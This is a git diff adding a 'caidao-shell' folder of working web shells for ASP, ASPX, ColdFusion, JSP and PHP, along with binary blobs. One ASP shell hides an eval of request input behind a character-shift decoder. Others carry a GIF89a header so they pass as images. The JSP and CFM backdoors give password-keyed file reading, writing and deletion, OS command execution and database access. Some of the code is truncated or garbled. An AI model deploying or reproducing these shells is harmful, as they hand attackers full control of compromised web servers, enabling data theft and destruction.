end of file diff --git a/caidao-shell/hkmjj.asp b/caidao-shell/hkmjj.asp new file mode 100644 index 0000000..100cc31 --- /dev/null +++ b/caidao-shell/hkmjj.asp @@ -0,0 +1,22 @@ +<% +codeds="Li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li" +execute (decode (codeds) ) +Function DeCode (Coded) + On Error Resume Next + For i = 1 To Len (Coded) + Curchar = Mid (Coded, i, 1) + If Asc (Curchar) = 16 then + Curchar = chr (8) +Elseif Asc (Curchar) = 24 then + Curchar = chr (12) +Elseif Asc (Curchar) = 32 then + Curchar = chr (18) + Else + Curchar = chr (Asc (Curchar) -3) + End if + DeCode = Decode&Curchar + Next +End Function +'response.write(decode(codeds)) +' ˵ /hkmjj.asp?xx=x , hkmjj +%> \ No newline at end of file diff --git a/caidao-shell/ice.asp b/caidao-shell/ice.asp new file mode 100644 index 0000000..290ad01 --- /dev/null +++ b/caidao-shell/ice.asp @@ -0,0 +1,2 @@ +GIF89a +<%eval request("ice")%> \ No newline at end of file diff --git a/caidao-shell/ice.aspx b/caidao-shell/ice.aspx new file mode 100644 index 0000000..cf41d48 --- /dev/null +++ b/caidao-shell/ice.aspx @@ -0,0 +1,2 @@ +GIF89a +<%@ Page Language="Jscript"%><%eval(Request.Item["ice"],"unsafe");%> \ No newline at end of file diff --git a/caidao-shell/ice.cfm b/caidao-shell/ice.cfm new file mode 100644 index 0000000..d747e2b --- /dev/null +++ b/caidao-shell/ice.cfm @@ -0,0 +1,27 @@ +O=O&Expandpath("./")&Chr(9); +for(c=65;c lt 91;c=c+1){if(DirectoryExists(Chr(c)&":\"))O=O&Chr(c)&":";} +O=O&D.Name;If(D.Type eq "Dir")O=O&"/"; +O=O&Chr(9)&DateFormat(D.DateLastModified,"yyyy-mm-dd")&TimeFormat(D.DateLastModified," HH:MM:ss")&Chr(9)&D.Size&Chr(9); +If(Left(Form.z1,1) eq "/"){O=O&D.Mode;}else{O=O&D.Attributes;}O=O&Chr(10); + +Function DF(P){F=CreateObject("java","java.io.File").init(P);L=0;i=0; +if(F.isDirectory()){L=F.listFiles();for(i=1;i lte ArrayLen(L);i=i+1){if(not L[i].delete()){DF(L[i].getPath());}}}F.delete();} +DF(Form.z1);O="1"; + +"&"|")), JavaCast("int",0), 3 ) /> + +F=CreateObject("java","java.io.FileOutputStream");F.init(Form.z1); +h="0123456789ABCDEF";C=Form.z2;for(i=0;i lt Len(C);i=i+2){F.write(BitOr(BitSHLN(h.indexOf(C.charAt(i)),4),h.indexOf(C.charAt(i+1))));} +F.close();O="1"; +Function CP(S,D){sf=CreateObject("java","java.io.File").init(S); +df=CreateObject("java","java.io.File").init(D);L=0;i=0;if(sf.isDirectory()){if(not df.exists()){df.mkdir();}L=sf.listFiles(); +for(i=1;i lte ArrayLen(L);i=i+1){if(L[i].isDirectory()){CP(L[i].getPath(),df.getPath()&"/"&L[i].getName());}else{ +cpf(L[i].getPath(),df.getPath()&"/"&L[i].getName());}}}else{cpf(S,D);}}CP(Form.z1,Form.z2);O="1"; + + +FileSetLastModified(Form.z1,ParseDateTime(Form.z2));O="1";Z=Form.z2; +For(i=Len(Z);i gt 0;i=i-1){if(Mid(Z,i,1) eq "/" Or Mid(Z,i,1) eq "\"){Break;}}P=Left(Z,i);F=Mid(Z,i+1,256); + + + +->#Chr(124)&O&Chr(124)#<- \ No newline at end of file diff --git a/caidao-shell/ice.jpg b/caidao-shell/ice.jpg new file mode 100644 index 0000000000000000000000000000000000000000..2d61496abf737ba321380f75c91ba64bf30b0f5a GIT binary patch literal 9023 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 Yt|{LLin$dOdsFLRSYXgWZFQ^v1qy?dasU7T literal 0 HcmV?d00001 diff --git a/caidao-shell/ice.jsp b/caidao-shell/ice.jsp new file mode 100644 index 0000000..2d89d73 --- /dev/null +++ b/caidao-shell/ice.jsp @@ -0,0 +1,59 @@ +<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%> +<%! +String Pwd="ice"; +String EC(String s,String c)throws Exception{return s;}//new String(s.getBytes("ISO-8859-1"),c);} +Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance(); +Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}return c;} +void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();} +void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile(); +FileOutputStream os=new FileOutputStream(f);for(int i=0;i<% +String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs); +String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs); +StringBuffer sb=new StringBuffer("");try{sb.append("->"+"|"); +if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}} +else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1)))); +while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();} +else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1)))); +bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);} +else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");} +else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");} +else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c); +MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);} +else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);} +}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString()); +%> \ No newline at end of file diff --git a/caidao-shell/ice.php b/caidao-shell/ice.php new file mode 100644 index 0000000..dc73cba --- /dev/null +++ b/caidao-shell/ice.php @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/caidao-shell/mdb.asp b/caidao-shell/mdb.asp new file mode 100644 index 0000000000000000000000000000000000000000..70141b8387da362be6cb7dafaf81b01e31043882 GIT binary patch literal 233472 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 